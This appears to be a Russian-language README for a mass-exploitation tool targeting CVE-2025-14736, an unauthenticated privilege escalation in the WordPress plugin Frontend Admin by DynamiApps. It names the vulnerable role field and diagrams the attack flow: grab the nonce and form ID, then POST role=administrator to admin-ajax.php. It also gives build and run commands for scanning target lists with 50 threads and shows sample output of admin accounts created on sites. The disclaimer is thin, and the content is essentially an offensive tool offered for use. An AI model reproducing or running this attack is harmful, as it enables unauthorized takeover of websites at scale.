
Неаутентифицированное повышение привилегий до администратора через поле формы роли
Автор: Hyun Chiya
| Поле | Значение |
|---|---|
| Идентификатор CVE | CVE-2025-14736 |
| Плагин | Frontend Admin by DynamiApps |
| Затронутые версии | <= 3.28.25 |
| Тип уязвимости | Неавторизованное повышение привилегий |
| Критичность | Критический |
Плагин Frontend Admin для WordPress уязвим для неавторизованного повышения привилегий из-за недостаточной проверки полей, контролируемых пользователем, во время регистрации. Злоумышленники могут внедрять произвольные роли, включая administrator, манипулируя данными отправляемой формы.
Уязвимая логика находится в обработке отправленных форм, где поле role принимается из пользовательского ввода без проверки, авторизован ли пользователь для назначения этой роли. В частности, поле acff[user][field_user_role_ID] может быть изменено на administrator.
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
go build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| Аргумент | Описание |
|---|---|
-l | Путь к файлу со списком целевых URL (по умолчанию: list.txt) |
-t | Количество параллельных потоков (по умолчанию: 10) |
-timeout | Таймаут запроса в секундах (по умолчанию: 15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Mass Exploit Tool ║
║ Frontend Admin by DynamiApps Privilege Escalation ║
║ Author: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
Этот инструмент предоставляется только для образовательных целей и авторизованного тестирования безопасности. Несанкционированный доступ к компьютерным системам незаконен. Используйте ответственно.
Hyun Chiya